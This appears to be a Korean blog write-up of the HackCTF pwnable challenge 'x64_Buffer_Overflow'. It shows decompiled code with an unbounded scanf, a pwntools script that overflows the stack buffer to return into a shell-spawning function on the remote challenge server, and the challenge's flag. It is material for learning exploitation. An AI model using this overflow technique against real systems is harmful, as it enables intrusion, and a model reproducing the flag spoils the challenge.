[HackCTF / pwnable] x64_Buffer_Overflow
2019. 10. 4. 04:16ㆍWargame & CTF/HackCTF
64비트 버퍼 오버플로우 문제이다.
1 2 3 4 5 6 7 8 9 10 | int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [rsp+10h] [rbp-110h] int v5; // [rsp+11Ch] [rbp-4h] _isoc99_scanf("%s", &s, envp); v5 = strlen(&s); printf("Hello %s\n", &s, argv); return 0; } | cs |
1 2 3 4 5 6 7 8 9 10 11 | int callMeMaybe() { char *path; // [rsp+0h] [rbp-20h] const char *v2; // [rsp+8h] [rbp-18h] __int64 v3; // [rsp+10h] [rbp-10h] path = "/bin/bash"; v2 = "-p"; v3 = 0LL; return execve("/bin/bash", &path, 0LL); } | cs |
callMeMaybe를 호출하면 쉘이 실행된다. ret에 callMeMaybe의 주소를 넣으면 쉘이 실행될것이다.
ex.py
1 2 3 4 5 6 7 8 9 10 11 12 | from pwn import * e = ELF("./64bof_basic") #p = process("./64bof_basic") p = remote("ctf.j0n9hyun.xyz", 3004) payload = "" payload += "A"*(0x110+0x8) payload += p64(e.symbols["callMeMaybe"]) p.sendline(payload) p.interactive() | cs |
x64_Buffer_Overflow : HackCTF{64b17_b0f_15_51mpl3_700}
'Wargame & CTF > HackCTF' 카테고리의 다른 글
| [HackCTF / pwnable] Simple_Overflow_ver_2 (0) | 2019.10.05 |
|---|---|
| [HackCTF / pwnable] x64_Simple_size_BOF (0) | 2019.10.04 |
| [HackCTF / pwnable] 내 버퍼가 흘러넘친다!!! (0) | 2019.10.04 |
| [HackCTF / pwnable] Basic_FSB (0) | 2019.10.04 |
| [HackCTF / pwnable] Basic_BOF #2 (0) | 2019.10.04 |